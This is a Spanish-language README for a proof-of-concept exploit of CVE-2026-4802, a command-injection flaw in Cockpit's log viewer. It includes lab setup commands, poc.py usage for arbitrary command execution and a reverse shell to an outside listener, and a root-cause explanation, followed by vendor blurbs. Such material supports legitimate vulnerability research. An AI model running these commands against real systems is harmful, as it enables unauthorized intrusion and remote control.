
Prueba de concepto de exploit para CVE-2026-4802, una vulnerabilidad de inyección de comandos en la interfaz de registros del sistema de Cockpit, que permite la ejecución arbitraria de comandos y shells inversas.
Un exploit de prueba de concepto para CVE-2026-4802, una Ejecución Remota de Código mediante Inyección de Comandos en la interfaz de registros del sistema de Cockpit (loadServiceFilters())
Compila y ejecuta el entorno vulnerable:
$ docker build -t cockpit-vuln .
$ docker run --rm -d --privileged -p 9090:9090 cockpit-vuln
# Comprueba si el objetivo es vulnerable
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode check
# Ejecuta comandos arbitrarios
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode exec --cmd "id"
# Shell inversa
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode reverse --lhost 10.0.0.1 --lport 4444

pkg/systemd/logsJournal.jsx)La función loadServiceFilters() en pkg/systemd/logsJournal.jsx construye comandos de shell uniendo arrays en cadenas con solo un escape de espacios antes de pasarlos a /bin/bash -ec. Los parámetros controlados por el usuario desde el fragmento de URL de la página de registros (p. ej. --since=) llegan a esta ruta de código sin sanitizar, lo que permite la inyección de metacaracteres de shell como la sustitución de comandos ($(...)).
Esta herramienta es solo para fines educativos y de investigación. Úsala únicamente en sistemas que poseas o para los que tengas permiso explícito de prueba. El autor no es responsable de ningún uso indebido o daño causado por este programa.
QuimeraX Intelligence es una plataforma avanzada de EASM e Inteligencia de Amenazas Cibernéticas especializada en identificar vulnerabilidades críticas en sistemas complejos. La plataforma supervisa, detecta y alerta proactivamente a los clientes sobre amenazas de seguridad, garantizando transparencia y una respuesta rápida ante riesgos potenciales. Los clientes reciben notificaciones inmediatas e informes completos si sus sistemas se encuentran vulnerables, lo que les permite tomar medidas de protección. aprende más
Hakai Security es una empresa de ciberseguridad fundada por profesionales de la seguridad, comprometida con la excelencia técnica. Ofrecemos soluciones de seguridad a medida que incluyen pruebas de penetración avanzadas, simulaciones realistas de Red Team y prácticas de desarrollo seguro para proteger proactivamente los activos de nuestros clientes frente a las amenazas cibernéticas en evolución.